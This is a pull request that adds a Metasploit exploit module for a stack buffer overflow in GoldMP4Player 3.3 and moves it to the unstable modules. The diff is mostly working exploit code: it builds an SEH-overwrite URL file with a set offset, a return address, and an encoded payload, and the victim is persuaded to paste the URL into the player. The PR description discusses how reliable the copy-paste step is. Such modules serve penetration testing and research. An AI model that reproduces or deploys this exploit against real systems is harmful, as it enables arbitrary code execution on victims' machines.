### PR TITLE
Move goldmp4player_url_bof to unstable

### DIFF
--- a/unstable-modules/exploits/unreliable/windows/fileformat/goldmp4player_url_bof.rb
+++ b/unstable-modules/exploits/unreliable/windows/fileformat/goldmp4player_url_bof.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GoldMP4Player URL Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability in
+        GoldMP4Player 3.3, caused by improper bounds checking of a URL.
+        By persuading the victim to copy the specially-crafted URL from the
+        resulting file and paste it into the Open Flash URL window, a remote
+        attacker could execute arbitrary code on the system or cause the
+        application to crash. This module has been tested successfully on
+        Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Gabor Seljan'  # Vulnerability discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'BID', '65855' ],
+          [ 'EDB', '31914' ],
+          [ 'EDB', '31972' ],
+          [ 'OSVDB', '103826' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process',
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'       => ((0..0xff).to_a - (0x21..0x7e).to_a).pack("C*"),
+          'Space'          => 6400,
+          'DisableNops'    => true,
+          'PrependEncoder' => "\x59\x59\x59\x59\x5C\x61\x59\x59\x59\x59\x59\x41\x41\x41\x41",
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'ESP'
+            },
+        },
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 / Windows 7 SP1',
+            {
+              'Offset' => 253,
+              'Ret'    => 0x10104544  # POP EBP # POP EBX # RETN [SkinPlusPlus.dll]
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Feb 27 2014',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt'])
+      ],
+    self.class)
+
+  end
+
+  def exploit
+
+    sploit =  rand_text_alpha(target['Offset'])
+    sploit << "\x4b\x4b\x77\x21"
+    sploit << [target.ret].pack('V')
+    sploit << rand_text_alpha(29)
+    sploit << payload.encoded
+
+    # Create the file
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create("http://#{sploit}.swf")
+
+  end
+end
+


### PR DESCRIPTION
Related to: https://github.com/rapid7/metasploit-framework/pull/4516 See the pull request for full discussion.

In summary, goldmp4player_url_bof requires an URL to be copy and pasted inside a GoldMP4Player textbox. Unfortunately the malicious URL won't contain only ascii characters, since the URL contains the "\x10" char (related to the ret address). Copy and paste from a `cat` on my iTerm (macosx) results in "\x10" chars not being pasted. 

Requiring copy and paste, and copy and paste from a "compatible" editor / viewer makes me feel it is going to be error prone. So I'm moving the module to unstable atm. 

Having an only ascii, or 'universally' (on any editor/viewer) working URL, would be good enough to me to land the module into rapid7/master.
